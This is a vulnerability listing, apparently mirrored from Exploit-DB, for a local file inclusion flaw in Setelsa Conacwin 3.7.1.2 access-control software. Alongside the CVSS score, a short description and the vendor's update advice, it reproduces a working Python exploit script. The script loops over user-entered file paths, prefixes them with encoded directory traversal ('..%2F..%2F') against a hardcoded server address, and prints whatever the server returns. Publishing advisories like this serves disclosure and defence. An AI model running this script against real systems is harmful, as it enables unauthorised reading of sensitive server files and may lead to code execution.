Setelsa Conacwin 3.7.1.2 - Local File Inclusion

vendor:

Conacwin

by:

Bryan Rodriguez Martin AKA tr3mb0

9.3

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Conacwin

Affected Version From: 3.7.1.2

Affected Version To: 3.7.1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:setelsa_security:conacwin:3.7.1.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2020

Setelsa Conacwin 3.7.1.2 – Local File Inclusion

A local file inclusion vulnerability exists in Setelsa Conacwin 3.7.1.2, which allows an attacker to include a local file on the web server. This can be exploited by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable server. This can allow an attacker to gain access to sensitive information or execute arbitrary code on the server.

Mitigation:

The recommendation from the vendor is to update to the last version.

Source

Exploit-DB raw data:

# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
# Date: 02/09/20
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
# Version: 3.7.1.2
# Tested on: Windows
# FIX: The recommendation from the vendor is to update to the last version.

import requests
import urllib.parse
import colorama

from colorama import Fore, Style

ENDPOINT = "http://10.4.8.11:8081/"

while True:
    cmd = input(Fore.RED + "[*] FILE >> ")
    print(Style.RESET_ALL)

    #cmd = urllib.parse.quote(cmd)
    ENDPOINT2 = ENDPOINT + "..%2F..%2F"  + cmd

    print("[*] Target >> " + ENDPOINT2)
    print(" ")
    r = requests.get(url = ENDPOINT2)

    extract = r.text
    print(extract)